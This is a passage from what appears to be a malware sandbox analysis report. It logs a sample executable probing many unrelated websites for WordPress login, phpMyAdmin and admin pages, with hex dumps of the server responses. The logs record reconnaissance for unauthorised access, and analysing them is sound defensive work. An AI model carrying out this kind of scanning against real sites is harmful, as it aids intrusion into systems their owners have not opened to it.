                                                                                                                                                                                                    2023-11-26 05:59:41 UTC420INData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 6d 61 72 67 69 6e 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 38 30 30 70 78 3b 7d 0a 20 20 20 20 2e 65 72 72 6f 72 20 7b 63 6f 6c 6f 72 3a 20 23 65 30 30 3b 7d 0a 20 20 20 20 70 72 65 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 7d 0a 20 20 20 20 68 31 20 7b 66
                                                                                                                                                                                                    Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title><style> body {margin: 20px; font-family: helvetica, sans-serif; max-width: 800px;} .error {color: #e00;} pre {font-size: 16px;} h1 {f
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    274192.168.2.46265734.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC175OUTGET /PhpMyAdmin HTTP/1.1
                                                                                                                                                                                                    Host: www.2brospw.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC1079INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 38 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 38 30 2e 38 34 31 31 30 33 32 38 32 33 31 36 36 35 32 31 38 31 30 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 53 65 72 76 65 72 3a 20 50 65 70 79 61 6b 61 2f 31 2e 31 39 2e 31 30
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Length: 2865Content-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978380.8411032823166521810Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC173INData Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d
                                                                                                                                                                                                    Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC1252INData Raw: 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                                                                                                                                                                                    Data Ascii: scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC1252INData Raw: 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 63 72 69 70 74 73 2f 65
                                                                                                                                                                                                    Data Ascii: party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.0/scripts/e
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC188INData Raw: 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: egardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    275192.168.2.462748162.210.96.1174436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC184OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: coralparkchristian.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC580INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6e 6d 76 6d 75 61 65 71 76 74 76 39 61 68 74 6c 71 68 67 72 62 6b 70
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:40 GMTServer: ApachePragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: PHPSESSID=nmvmuaeqvtv9ahtlqhgrbkp
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC3247INData Raw: 63 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 69 65 38 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 38 29 20 5d 3e 3c 21 2d 2d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74
                                                                                                                                                                                                    Data Ascii: ca8<!DOCTYPE html>...[if IE 8]><html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US"><![endif]-->...[if !(IE 8) ]>...><html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">...<![endif]--><head><meta http-equiv="Cont
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    276192.168.2.46270272.167.58.1614436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC172OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: webstamp.ca
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC275INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 75 70 67 72 61 64 65 2d 69 6e 73 65 63 75 72 65 2d 72 65 71 75 65 73 74 73 3b 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 55 70 67 72 61 64 65 2c 20 63 6c 6f 73 65 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:41 GMTServer: ApacheContent-Security-Policy: upgrade-insecure-requests;Upgrade: h2,h2cConnection: Upgrade, closeAccept-Ranges: bytesVary: Accept-EncodingTransfer-Encoding: chunkedContent
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC648INData Raw: 32 37 63 0d 0a 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 4f 4f 50 53 21 20 53 6f 6d 65 74 68 69 6e 67 20 77 65 6e 74 20 77 72 6f 6e 67 2e 20 54 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 68 61 73 20 62 65 65 6e 20 0d 0a 72 65 6d 6f 76 65 64 20 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 64 65 72 20 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 0d 0a 46 65 65 6c 20 66 72 65 65 20 74 6f 20 72 65 61 64 20 74 68 65 20 6d 61 6e 79 20 6f 74 68 65 72 20 61 72 74 69 63 6c 65 73 20 61 76 61 69 6c 61 62 6c 65 20 61 74 20 0d 0a 68 74 74 70 73 3a 2f 2f 77 65 62 73 74 61 6d 70 2e 63 61 0d 0a 3c 21 2d 2d 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: 27c/PhpMyAdmin/OOPS! Something went wrong. The page you requested has been removed or is currently under maintenance.Feel free to read the many other articles available at https://webstamp.ca...


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    277192.168.2.46288534.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC174OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                    Host: www.2brospw.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1084INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 38 30 2e 39 33 35 31 30 33 35 36 33 30 33 33 39 34 37 31 36 37 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 53 65 72 76 65 72 3a 20 50 65 70 79 61 6b 61 2f 31 2e 31 39 2e 31 30 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978380.935103563033947167Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10X-Content-Type-Option
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC168INData Raw: 62 33 31 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c
                                                                                                                                                                                                    Data Ascii: b31 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scal
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1252INData Raw: 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d
                                                                                                                                                                                                    Data Ascii: e=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <m
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1252INData Raw: 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30
                                                                                                                                                                                                    Data Ascii: ces/third-party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC205INData Raw: 20 20 20 3c 73 70 61 6e 3e 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: <span>Regardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    278192.168.2.462809162.250.126.54436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC180OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: mydirectlender.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC527INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 25 32 30 43 6f 6f 6b 69 65 25 32 30 63 68 65 63 6b 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 0d 0a 78 2d 66 72 61 6d 65 2d 6f 70 74 69 6f 6e 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8set-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; securex-frame-options
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC841INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 53 74 61 67 69 6e 67 20 66 6f 72 20 4d 79 44 69 72 65 63 74 4c 65 6e 64 65 72 2e 63 6f 6d 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Staging for MyDirectLender.com &#8212; WordPress</title><meta name='robots' content='noindex, nofollow' /><scrip
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC5794INData Raw: 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 6f 72 6d 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 31 30 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f
                                                                                                                                                                                                    Data Ascii: nk rel='stylesheet' id='forms-css' href='https://mydirectlender.com/wp-admin/css/forms.min.css?ver=6.4.1' type='text/css' media='all' /><link rel='stylesheet' id='l10n-css' href='https://mydirectlender.com/wp-admin/css/l10n.min.css?ver=6.4.1' type='text/


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    279192.168.2.462881104.26.12.2454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC176OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: hightideinc.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
